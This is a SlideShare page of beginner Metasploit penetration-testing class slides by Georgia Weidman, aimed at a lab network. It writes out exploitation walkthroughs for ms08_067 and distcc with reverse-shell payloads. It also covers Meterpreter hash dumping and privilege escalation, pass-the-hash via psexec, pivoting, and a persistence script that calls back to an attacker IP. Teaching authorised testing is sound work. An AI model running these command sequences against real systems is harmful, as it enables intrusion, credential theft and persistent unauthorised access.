Penetration Testing with      Metasploit        Georgia Weidman
Acknowledgements•   Metasploit Team•   Offensive Security/Metasploit Unleashed•   Hackers for Charity•   David Kennedy•   ...
Agenda• Metasploit Basics  – Some terminology/brief intro to pentesting  – How Metasploit works  – Interacting with Metasp...
Agenda• Metasploit in a penetration test  – Information Gathering  – Vulnerability Scanning  – Exploitation in depth  – Po...
ConnectingWireless access point SSID IgnatiusRileyPassword: metasploit
What’s in the lab?• Windows XP SP2  – IP address: 192.168.20.22• Ubuntu Linux 8.04 (Metasploitable)  – IP address: 192.168...
What is Penetration Testing?Simulation of a real attackGet out of jail free card for exploiting systemsReport to customers...
What is Metasploit?Exploitation frameworkRuby basedModularExploits, payloads, auxiliaries, and more
Metasploit TerminologyExploit: vector for penetrating the systemPayload: shellcode, what you want the exploit to  doEncode...
Metasploit InterfacesMsfconsoleMsfcliMsfweb, Msfgui (discontinued)Metasploit Pro, Metasploit ExpressArmitage
Exploitation Streamlining• Traditional Pentest:  – Find public exploit  – Change offsets and return address for your targe...
Using Msfconsole: Exploitationuse <module> - sets exploit/auxillary/etc. to useset <x X> - set a parametersetg <x X> - set...
Windows Exploitation Examplesearch windows/smbinfo windows/smb/ms08_067_netapiuse windows/smb/ms08_067_netapishow payloads...
MSFcli Exploitation Example./msfcli <exploit> <option=x> EExample: msfcli  windows/smb/ms08_067_netapiRHOST=192.168.1.2 LH...
Linux Exploitation Examplesearch distccuse unix/misc/distcc_execshow payloadsset payload cmd/unix/reverseshow optionsset r...
Sessionssessions -l lists all active sessionsSessions –i <id> interact with a given session
MeterpreterGain a session using a meterpreter payloadMemory based/never hits the diskEverything a shell can do plus extra
Meterpreter Commandshelp – shows all available commandsbackground – backgrounds the sessionps – shows all processesmigrate...
Meterpreter Commandsdownload <file> - pulls a file from the victimupload <file on attacker> <file on victim> -  pushes a f...
ExerciseIn Msfconsole use ms08_067_netapi to get a  reverse meterpreter shell on the Windows XP  machine.Experiment with d...
Information GatheringLearning as much about a target as possibleExamples: open ports, running services, installed  softwar...
Metasploit and DatabasesMetasploit supports MySQL and PostgreSQL/etc/init.d/postgresql-8.4 start (starts  PostgeSQL)msf > ...
PortscanningQueries a host to see if a program is listeningEx: Browsing to a website – webserver listens on   port 80Liste...
Metasploit and nmapPort scanning and just about everything elsehttp://nmap.org/ man nmapEx: nmap -sV 192.168.20.20-99 -oA ...
MSF Axillary Portscannersmsf > search portscan (shows portscan modules)scanner/portscan/tcp (runs a TCP syn scan)Use auxil...
Some Other MSF Scannersscanner/smb/smb_version (scans port 445 for  the smb version, good way to get OS version)scanner/ss...
Vulnerability ScanningQuery systems for potential vulnerabilitiesIdentify potential methods of penetrationEx: SMB version ...
Metasploit and NessusTenables Vulnerability Scanner (http://www.nessus.org)msf>load nessusmsf > nessus_connect  student1:p...
Metasploit Vulnerability ScannersSMB Login  Given a set of credentials what systems can they     access?     scanner/smb/s...
Using Msfconsole: Exploitationuse <module> - sets exploit/auxillary/etc. to useset <x X> - set a parametersetg <x X> - set...
Our Databasehostsservicesvulns-c select columns-s search for specific string
db_autopwnBy default just runs all the exploits that match a  given open portNot stealthyUsing vulnerability data can be m...
Attacking MSSQLMSSQL TCP port can change, UDP port is 1434msf> search mssql (shows all mssql modules)msf> use scanner/mssq...
We have a shell, now what?Privilege escalationLocal information gatheringExploiting additional hostsMaintaining accessFore...
Meterpreter: Privilege EscalationA session has the privileges of the exploited  processgetuid (tells you what user your se...
Meterpreter: Enabling Remote               DesktopTurn on remote desktop, get it through the  firewall, put a user in the ...
Meterpreter: MigratingIf the process that hosts meterpreter closes   meterpreter dies tooExample: client side exploit resi...
Meterpreter: Searching for ContentLook for specific interesting files on the  exploited systemsearch -hExample: search -f ...
PivotingScenario: Exploit a dual networked host, with a  routeable interface and non routable one. Can we  attack other ho...
PSExechashdump (dumps the hashes, not always easy  to crack)Why not just pass the hash to other systems?use windows/smb/ps...
Meterpreter: PersistencePersistence script installs a meterpreter serviceMeterpreter comes back when the box restarts  Ex:...
ExercisesPerform a penetration test on the Windows and  Linux systems we used in classPerform a penetration test on the la...
Contact        Georgia WeidmanWebsite: http://www.grmn00bs.com http://www.georgiaweidman.com  Email: georgia@grmn00bs.com ...
Upcoming SlideShare
Loading in …5
×

Metasploit for Penetration Testing: Beginner Class

30,092 views
29,545 views

Published on

Slides for the beginning Metasploit class.

Published in: Technology
1 Comment
29 Likes
Statistics
Notes
No Downloads
Views
Total views
30,092
On SlideShare
0
From Embeds
0
Number of Embeds
289
Actions
Shares
0
Downloads
1,595
Comments
1
Likes
29
Embeds 0
No embeds

No notes for slide

Metasploit for Penetration Testing: Beginner Class

  1. 1. Penetration Testing with Metasploit Georgia Weidman
  2. 2. Acknowledgements• Metasploit Team• Offensive Security/Metasploit Unleashed• Hackers for Charity• David Kennedy• BSides Delaware Crew• Darren
  3. 3. Agenda• Metasploit Basics – Some terminology/brief intro to pentesting – How Metasploit works – Interacting with Metasploit• Basic Exploitation – Exploiting a vulnerability using Metasploit console• Using Meterpreter – Using the Meterpreter shell for post exploitation
  4. 4. Agenda• Metasploit in a penetration test – Information Gathering – Vulnerability Scanning – Exploitation in depth – Post exploitation – Reporting• Hack some stuff – Pop my boxes
  5. 5. ConnectingWireless access point SSID IgnatiusRileyPassword: metasploit
  6. 6. What’s in the lab?• Windows XP SP2 – IP address: 192.168.20.22• Ubuntu Linux 8.04 (Metasploitable) – IP address: 192.168.20.23 Others below .100 (.100 and above are you guys)
  7. 7. What is Penetration Testing?Simulation of a real attackGet out of jail free card for exploiting systemsReport to customers with findings and recommendationsFind and remediate vulnerabilities before attackers exploit them
  8. 8. What is Metasploit?Exploitation frameworkRuby basedModularExploits, payloads, auxiliaries, and more
  9. 9. Metasploit TerminologyExploit: vector for penetrating the systemPayload: shellcode, what you want the exploit to doEncoders: encode or mangle payloadAuxiliary: other modules besides exploitationSession: connection from a successful exploit
  10. 10. Metasploit InterfacesMsfconsoleMsfcliMsfweb, Msfgui (discontinued)Metasploit Pro, Metasploit ExpressArmitage
  11. 11. Exploitation Streamlining• Traditional Pentest: – Find public exploit – Change offsets and return address for your target – Replace shellcode• Metasploit: – Load Metasploit module – Select target OS – Set IP addresses – Select payload
  12. 12. Using Msfconsole: Exploitationuse <module> - sets exploit/auxillary/etc. to useset <x X> - set a parametersetg <x X> - set a parameter globallyshow <x> - lists all available xexploit – runs the selected module
  13. 13. Windows Exploitation Examplesearch windows/smbinfo windows/smb/ms08_067_netapiuse windows/smb/ms08_067_netapishow payloadsset payload windows/meterpreter/reverse_tcpshow optionsset lhost 192.168.20.22 (set other options as well)exploit
  14. 14. MSFcli Exploitation Example./msfcli <exploit> <option=x> EExample: msfcli windows/smb/ms08_067_netapiRHOST=192.168.1.2 LHOST=192.168.1.3PAYLOAD=windows/shell/bind_tcp EE = exploitO = show optionsP = show payloads
  15. 15. Linux Exploitation Examplesearch distccuse unix/misc/distcc_execshow payloadsset payload cmd/unix/reverseshow optionsset rhost 192.168.20.23set lhost 192.168.20.102 (your ip)exploit
  16. 16. Sessionssessions -l lists all active sessionsSessions –i <id> interact with a given session
  17. 17. MeterpreterGain a session using a meterpreter payloadMemory based/never hits the diskEverything a shell can do plus extra
  18. 18. Meterpreter Commandshelp – shows all available commandsbackground – backgrounds the sessionps – shows all processesmigrate <process id>– moves meterpreter toanother processgetuid – shows the user
  19. 19. Meterpreter Commandsdownload <file> - pulls a file from the victimupload <file on attacker> <file on victim> - pushes a file to the victimhashdump – dumps the hashes from the samshell – drops you in a shell
  20. 20. ExerciseIn Msfconsole use ms08_067_netapi to get a reverse meterpreter shell on the Windows XP machine.Experiment with different payloads and meterpreter commands.
  21. 21. Information GatheringLearning as much about a target as possibleExamples: open ports, running services, installed softwareIdentify points for further exploration
  22. 22. Metasploit and DatabasesMetasploit supports MySQL and PostgreSQL/etc/init.d/postgresql-8.4 start (starts PostgeSQL)msf > db_connectpostgres:password@127.0.0.1/metasploit (connects to database server and creates database metasploit)
  23. 23. PortscanningQueries a host to see if a program is listeningEx: Browsing to a website – webserver listens on port 80Listening ports are accessible by an attacker and if vulnerable may be used for exploitationEx: ms08_067_netapi exploits smb on port 445
  24. 24. Metasploit and nmapPort scanning and just about everything elsehttp://nmap.org/ man nmapEx: nmap -sV 192.168.20.20-99 -oA subnet1 (TCP version scan, all hosts 192.168.20.X, outputs multiple formats beginning with subnet1)msf > db_import subnet1.xml
  25. 25. MSF Axillary Portscannersmsf > search portscan (shows portscan modules)scanner/portscan/tcp (runs a TCP syn scan)Use auxiliary modules like exploits (use, set, exploit, etc.)
  26. 26. Some Other MSF Scannersscanner/smb/smb_version (scans port 445 for the smb version, good way to get OS version)scanner/ssh/ssh_version (queries the ssh version)scanner/ftp/anonymous (anonymous ftp login)
  27. 27. Vulnerability ScanningQuery systems for potential vulnerabilitiesIdentify potential methods of penetrationEx: SMB version scan in information gathering returned port 445 open and target Windows XP SP2, scan for ms08_067_netapi vulnerability
  28. 28. Metasploit and NessusTenables Vulnerability Scanner (http://www.nessus.org)msf>load nessusmsf > nessus_connect student1:password@192.168.20.103 ok (ok says no ssl is ok)msf > nessus_policy_listmsf > nessus_scan_new -4 pwnage <ip range> (scan using policy one, name it pwnage)msf> nessus_report_listmsf> nessus_report_get <report id>
  29. 29. Metasploit Vulnerability ScannersSMB Login Given a set of credentials what systems can they access? scanner/smb/smb_loginOpen VNC and X11 If misconfigured may be accessible without credentials scanner/vnc/vnc_none_auth scanner/x11/open_x11
  30. 30. Using Msfconsole: Exploitationuse <module> - sets exploit/auxillary/etc. to useset <x X> - set a parametersetg <x X> - set a parameter globallyshow <x> - lists all available xexploit – runs the selected module
  31. 31. Our Databasehostsservicesvulns-c select columns-s search for specific string
  32. 32. db_autopwnBy default just runs all the exploits that match a given open portNot stealthyUsing vulnerability data can be made smarter, matches vulnerabilities instead of portsdb_autopwn -x -e
  33. 33. Attacking MSSQLMSSQL TCP port can change, UDP port is 1434msf> search mssql (shows all mssql modules)msf> use scanner/mssql/mssql_ping (queries UDP 1434 for information including TCP port)msf> use scanner/mssql/mssql_login (tries passwords to log into mssql)msf> use windows/mssql/mssql_payload (logs into mssql and gets a shell
  34. 34. We have a shell, now what?Privilege escalationLocal information gatheringExploiting additional hostsMaintaining accessForensic avoidance
  35. 35. Meterpreter: Privilege EscalationA session has the privileges of the exploited processgetuid (tells you what user your session is running as)getsystem (tries various techniques to escalate privileges)
  36. 36. Meterpreter: Enabling Remote DesktopTurn on remote desktop, get it through the firewall, put a user in the remote desktop users grouprun getgui –e
  37. 37. Meterpreter: MigratingIf the process that hosts meterpreter closes meterpreter dies tooExample: client side exploit residing in the browsermeterpreter> ps (shows all processes)meterpreter> migrate <process id> (moves to a new process)
  38. 38. Meterpreter: Searching for ContentLook for specific interesting files on the exploited systemsearch -hExample: search -f *.jpg (finds all the porn)
  39. 39. PivotingScenario: Exploit a dual networked host, with a routeable interface and non routable one. Can we attack other hosts on the non routeable interface without SSH tunneling?Route add 10.0.0.0/24 1 (routes traffic to the subnet through session 1)Now you can portscan, exploit, etc. the non routable subnet
  40. 40. PSExechashdump (dumps the hashes, not always easy to crack)Why not just pass the hash to other systems?use windows/smb/psexecset SMBPass to the hash
  41. 41. Meterpreter: PersistencePersistence script installs a meterpreter serviceMeterpreter comes back when the box restarts Ex: run persistence -U -i 5 -p 443 –r 192.168.20.101 (respawns on login, at a 5 second interval on port 443 to ip 192.168.20.101)
  42. 42. ExercisesPerform a penetration test on the Windows and Linux systems we used in classPerform a penetration test on the lab network
  43. 43. Contact Georgia WeidmanWebsite: http://www.grmn00bs.com http://www.georgiaweidman.com Email: georgia@grmn00bs.com Twitter: @vincentkadmon

×